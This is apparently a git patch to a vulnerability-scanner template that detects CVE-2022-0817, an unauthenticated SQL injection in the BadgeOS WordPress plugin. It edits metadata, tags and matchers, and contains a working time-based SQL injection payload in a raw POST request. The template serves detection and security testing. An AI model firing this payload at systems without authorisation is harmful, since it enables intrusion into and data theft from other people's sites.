From c45172b1f0fd712242f7029e8b8d20322d8c0c5e Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Thu, 27 Oct 2022 20:05:16 +0530
Subject: [PATCH] Update CVE-2022-0817.yaml

---
 cves/2022/CVE-2022-0817.yaml | 17 +++++++----------
 1 file changed, 7 insertions(+), 10 deletions(-)

diff --git a/cves/2022/CVE-2022-0817.yaml b/cves/2022/CVE-2022-0817.yaml
index 5f70601fbd..9b4e840d91 100644
--- a/cves/2022/CVE-2022-0817.yaml
+++ b/cves/2022/CVE-2022-0817.yaml
@@ -1,7 +1,7 @@
 id: CVE-2022-0817
 
 info:
-  name: BadgeOS < 3.7.1 - Unauthenticated SQLi
+  name: BadgeOS < 3.7.1 - Unauthenticated SQL Injection
   author: theamanrawat
   severity: critical
   description: |
@@ -11,13 +11,10 @@ info:
     - https://wordpress.org/plugins/badgeos/
     - https://nvd.nist.gov/vuln/detail/CVE-2022-0817
   classification:
-    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
-    cvss-score: 9.8
     cve-id: CVE-2022-0817
-    cwe-id: CWE-89
   metadata:
-    verified: "true"
-  tags: cve,cve2022,sqli,wpscan,wordpress,wp-plugin,wp,badgeos,unauth
+    verified: true
+  tags: cve,cve2022,wordpress,wp-plugin,wp,badgeos,unauth,sqli
 
 requests:
   - raw:
@@ -27,13 +24,13 @@ requests:
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded
 
-        action=get-achievements&total_only=true&user_id=11+AND+(SELECT+9628+FROM+(SELECT(SLEEP(5)))WOrh)--+KUsb
+        action=get-achievements&total_only=true&user_id=11+AND+(SELECT+9628+FROM+(SELECT(SLEEP(6)))WOrh)--+KUsb
 
     matchers:
       - type: dsl
         dsl:
-          - 'duration>=5'
+          - 'duration>=6'
           - 'status_code == 200'
           - 'contains(content_type, "application/json")'
-          - 'contains(body, "11 AND (SELECT 9628 FROM (SELECT(SLEEP(5)))WOrh)-- KUsb")'
-        condition: and
\ No newline at end of file
+          - 'contains(body, "badgeos-arrange-buttons")'
+        condition: and